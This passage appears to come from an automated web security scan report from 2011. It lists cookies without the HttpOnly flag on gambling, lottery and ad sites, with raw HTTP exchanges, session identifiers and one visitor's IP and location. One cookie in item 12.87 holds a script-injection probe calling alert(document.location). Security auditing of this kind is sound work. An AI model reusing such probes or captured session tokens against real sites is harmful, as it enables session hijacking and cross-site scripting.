User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.81. http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.national-lottery.co.uk
Path:	/player/p/help/scratchcard.ftl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Ok27qpuCKPMzjQYnoTwhEVk:1470746us; Path=/
CAMTRACK=10.250.3.21.1305547932390731; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /player/p/help/scratchcard.ftl HTTP/1.1
Host: www.national-lottery.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:12 GMT
Server: national-lottery
Set-Cookie: CAMTRACK=10.250.3.21.1305547932390731; path=/
Last-Modified: Mon, 16 May 2011 12:12:12 GMT
Content-Length: 22431
Set-Cookie: JSESSIONID=0000Ok27qpuCKPMzjQYnoTwhEVk:1470746us; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=60, s-maxage=60, no-cache=set-cookie
Vary: Accept-Encoding
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" comment "ICRAonline EN v2.0" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir
...[SNIP]...

12.82. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.83. http://www.paysafecard.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.paysafecard.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=t8de4gunlo4krakeb1g01vitn1; path=/
fe_typo_user=f9a814cd38256b643fb5f503c8119f02; path=/
psc_country=a%3A9%3A%7Bs%3A9%3A%22ipAddress%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A11%3A%22countryCode%22%3Bs%3A2%3A%22US%22%3Bs%3A11%3A%22countryName%22%3Bs%3A13%3A%22United+States%22%3Bs%3A10%3A%22regionCode%22%3Bs%3A2%3A%2248%22%3Bs%3A10%3A%22regionName%22%3Bs%3A5%3A%22Texas%22%3Bs%3A7%3A%22zipcode%22%3Bs%3A5%3A%2275207%22%3Bs%3A4%3A%22city%22%3Bs%3A6%3A%22Dallas%22%3Bs%3A8%3A%22latitude%22%3Bd%3A32.782501220703125%3Bs%3A9%3A%22longitude%22%3Bd%3A-96.82070159912109375%3B%7D; expires=Tue, 15-May-2012 12:32:02 GMT
TSdab043=18196f71d7d188055573ab30d803bd03c93fc654ccfd9f7f4dd119415a5ab5a8a50b03869c5eca85db19f1b52b66441396171faf; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.paysafecard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 12:32:01 GMT
X-Powered-By: PHP/5.2.12
Set-Cookie: fe_typo_user=f9a814cd38256b643fb5f503c8119f02; path=/
Set-Cookie: PHPSESSID=t8de4gunlo4krakeb1g01vitn1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: psc_country=a%3A9%3A%7Bs%3A9%3A%22ipAddress%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A11%3A%22countryCode%22%3Bs%3A2%3A%22US%22%3Bs%3A11%3A%22countryName%22%3Bs%3A13%3A%22United+States%22%3Bs%3A10%3A%22regionCode%22%3Bs%3A2%3A%2248%22%3Bs%3A10%3A%22regionName%22%3Bs%3A5%3A%22Texas%22%3Bs%3A7%3A%22zipcode%22%3Bs%3A5%3A%2275207%22%3Bs%3A4%3A%22city%22%3Bs%3A6%3A%22Dallas%22%3Bs%3A8%3A%22latitude%22%3Bd%3A32.782501220703125%3Bs%3A9%3A%22longitude%22%3Bd%3A-96.82070159912109375%3B%7D; expires=Tue, 15-May-2012 12:32:02 GMT
Location: us/us-paysafecard/
Content-Length: 0
Content-Type: text/html
Connection: close
Set-Cookie: TSdab043=18196f71d7d188055573ab30d803bd03c93fc654ccfd9f7f4dd119415a5ab5a8a50b03869c5eca85db19f1b52b66441396171faf; Path=/

12.84. http://www.primegaming.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.primegaming.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQCQTQDD=PLOHBIGAACPHBCCONPKKDOGK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primegaming.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Mon, 16 May 2011 12:44:48 GMT
Content-Length: 5253
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQCQTQDD=PLOHBIGAACPHBCCONPKKDOGK; path=/

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>PrimeGaming.com - Leading Gaming Brands Online</title>
<meta name="keywords" content="casino online, poker
...[SNIP]...

12.85. http://www.primegrattage.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.primegrattage.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.86. http://www.primescratchcards.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.primescratchcards.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCQTRSBSQ=OHLOLGNDBFFPCKPGPEBMNJLJ; path=/
ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.87. http://www.primescratchcards.com/index.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCQTRSBSQ=OCCAMGNDCGHEBKEEJCJBDFCH; path=/
ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.88. http://www.primescratchcards.com.br/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.primescratchcards.com.br
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCSTQTATQ=MKIMCHNDLBCPHFIMNELFEJOM; path=/
MTH=1072%2D100%2Dpt; expires=Wed, 15-Jun-2011 11:46:50 GMT; domain=.primescratchcards.com; path=/
ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.89. http://www.vincite.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vincite.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103122908; path=/; domain=.vincite.net
WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.90. http://www.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103122734; path=/; domain=.winnings.com
WinningsSID=4ghnev4ktomhtdlm6482aj6993; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
winnings[vid]=540130; expires=Tue, 15-May-2012 11:41:07 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.91. http://www.winnings.com/xmlrpc.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.winnings.com
Path:	/xmlrpc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123582; path=/; domain=.winnings.com
WinningsSID=gpfb87spheemujmu5ahuq54h47; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
winnings[vid]=540957; expires=Tue, 15-May-2012 12:35:10 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.92. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!%!.`.U!!!!#<y'ux!1mR[!!!!#=!o!b!2$8S!!!!#<y'ui"; path=/; expires=Wed, 15-May-2013 12:52:16 GMT
vuday1=^cl!`NDf0(d)(<w; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
lifb=Y%rwY(3p6)LPwl1; path=/; expires=Mon, 16-May-2011 13:52:16 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

12.93. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!!k!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!$=!iJp!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#6f-!!!!#=!iRq!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!$=!iR@!#b?f!!!!(=!msh!#b?y!!!!#=!dNx!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!%=!iWP!#q4c!!!!$=!iWQ!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 11:41:41 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=706968&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.bigmoneyscratch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; ih="b!!!!#!1mH9!!!!#=!i98"; vuday1=%)0sHNDf0(n(#JG; pv1="b!!!!#!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~"; lifb=@Aum6=mRs]u7k!H; bh="b!!!!j!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!$=!iJp!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#/h(!!!!(=!msk!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#6f-!!!!#=!iRq!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!$=!iR@!#b?f!!!!(=!msh!#b?y!!!!#=!dNx!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!%=!iWP!#q4c!!!!$=!iWQ!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:41 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!k!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!$=!iJp!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#6f-!!!!#=!iRq!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!$=!iR@!#b?f!!!!(=!msh!#b?y!!!!#=!dNx!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!%=!iWP!#q4c!!!!$=!iWQ!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 11:41:41 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 11:41:41 GMT
Pragma: no-cache
Content-Length: 0
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

12.94. http://affiliates.interwetten.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliates.interwetten.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.95. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/Metacafe/lists/metacafe/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.96. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 12:49:29 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.97. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3POVLDMBQG4D924ihSIE
...[SNIP]...

12.98. http://br.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.99. http://br.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:02:48 GMT; path=/
UniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.100. http://d.tradex.openx.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

